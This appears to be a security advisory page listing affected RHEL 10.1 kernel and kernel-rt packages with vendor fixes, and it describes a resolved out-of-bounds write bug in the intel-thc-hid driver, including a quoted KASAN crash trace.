|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
In the Linux kernel, the following vulnerability has been resolved: HID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save Improper use of secondary pointer (&dev->i2c_subip_regs) caused kernel crash and out-of-bounds error: BUG: KASAN: slab-out-of-bounds in _regmap_bulk_read+0x449/0x510 Write of size 4 at addr ffff888136005dc0 by task kworker/u33:5/5107 CPU: 3 UID: 0 PID: 5107 Comm: kworker/u33:5 Not tainted 6.16.0+ #3 PREEMPT(voluntary) Workqueue: async async_run_entry_fn Call Trace: <TASK> dump_stack_lvl+0x76/0xa0 print_report+0xd1/0x660 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? kasan_complete_mode_report_info+0x26/0x200 kasan_report+0xe1/0x120 ? _regmap_bulk_read+0x449/0x510 ? _regmap_bulk_read+0x449/0x510 __asan_report_store4_noabort+0x17/0x30 _regmap_bulk_read+0x449/0x510 ? __pfx__regmap_bulk_read+0x10/0x10 regmap_bulk_read+0x270/0x3d0 pio_complete+0x1ee/0x2c0 [intel_thc] ? __pfx_pio_complete+0x10/0x10 [intel_thc] ? __pfx_pio_wait+0x10/0x10 [intel_thc] ? regmap_update_bits_base+0x13b/0x1f0 thc_i2c_subip_pio_read+0x117/0x270 [intel_thc] thc_i2c_subip_regs_save+0xc2/0x140 [intel_thc] ? __pfx_thc_i2c_subip_regs_save+0x10/0x10 [intel_thc] [...] The buggy address belongs to the object at ffff888136005d00 which belongs to the cache kmalloc-rnd-12-192 of size 192 The buggy address is located 0 bytes to the right of allocated 192-byte region [ffff888136005d00, ffff888136005dc0) Replaced with direct array indexing (&dev->i2c_subip_regs[i]) to ensure safe memory access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
